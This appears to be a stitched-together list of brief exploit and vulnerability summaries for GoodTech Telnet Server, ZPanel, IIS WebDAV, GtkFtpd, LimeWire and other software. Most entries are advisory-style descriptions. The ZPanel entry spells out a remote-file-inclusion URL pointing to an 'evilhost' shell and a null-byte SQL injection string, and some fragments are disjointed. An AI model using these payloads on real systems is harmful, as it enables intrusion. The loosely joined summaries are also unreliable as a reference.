This is a buffer overflow exploit for the GoodTech software. It allows an attacker to execute arbitrary code on the target system. The exploit connects to a remote host and can either open a bind shell or establish a reverse shell.
The vulnerability exists in the 'admin_func.php' file of the Arab portal 2.2 script. By injecting a specially crafted header, an attacker can bypass authentication and execute arbitrary SQL queries. The vulnerable code is located at line 192. An exploit for this vulnerability involves using the 'X-Forwarded-For Spoofer' tool to inject the client IP in the header.
This exploit connects to the Administration server of GoodTech Telnet Server (default port 2380) and sends a very long string (10040 bytes). After the exploit is sent, the Telnet Server will crash, trying to access a bad memory address: 0xDEADCODE.
It is possible to include arbitrary files in ZPanel version 2.0 and ZPanel version 2.5 beta 10. The exploit for version 2.0 involves accessing http://localhost/zpanel/zpanel.php?page=http://evilhost/shell, where http://evilhost/shell.php contains the malicious PHP code. The exploit for version 2.5 beta involves accessing http://localhost/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1.
The addadminmembercode.php file in ShaadiClone v2.0 allows an attacker to gain sensitive information such as usernames and passwords by manipulating the form fields.
This exploit allows an attacker to bypass authentication in Microsoft IIS 6.0 WebDAV. It can be used to retrieve source code or upload files to the server. The exploit takes advantage of a vulnerability in the handling of certain HTTP requests.
GtkFtpd, versions v1.0.4 and below, contain a remotely exploitable buffer overflow. The overflow occurs when GtkFtpd allocates the appropriate amount of memory to hold a filename or directory(256 bytes), but does not account for the date/user/stat prefix(~40 bytes) it prepends to the buffer. When exploited, GtkFtpd does not chroot() or drop its root privileges while running, making it possible to brute force the buffer overflow. A valid account and a writable directory are required to exploit the vulnerability.
There is a SafeMod bypass vulnerability in PHP <= 5.2.9 on Windows. The issue arises from the implementation and interfacing between PHP and the operating system's directory structure. PHP does not differentiate between directory browsing in Linux and Windows, allowing an attacker to execute commands on the target machine even with SafeMod enabled (php.ini setting).
This bug is a typical result of what we call unclamped loop. An "attacker" will give the Radius value of the Circle attribute a very big value.
This exploit allows an attacker to remotely execute arbitrary code on a system running Limewire versions 4.1.2 to 4.5.6. The exploit takes advantage of a vulnerability in the software's handling of certain HTTP requests. By sending a specially crafted request, an attacker can execute arbitrary code on the target system.
Services By CQR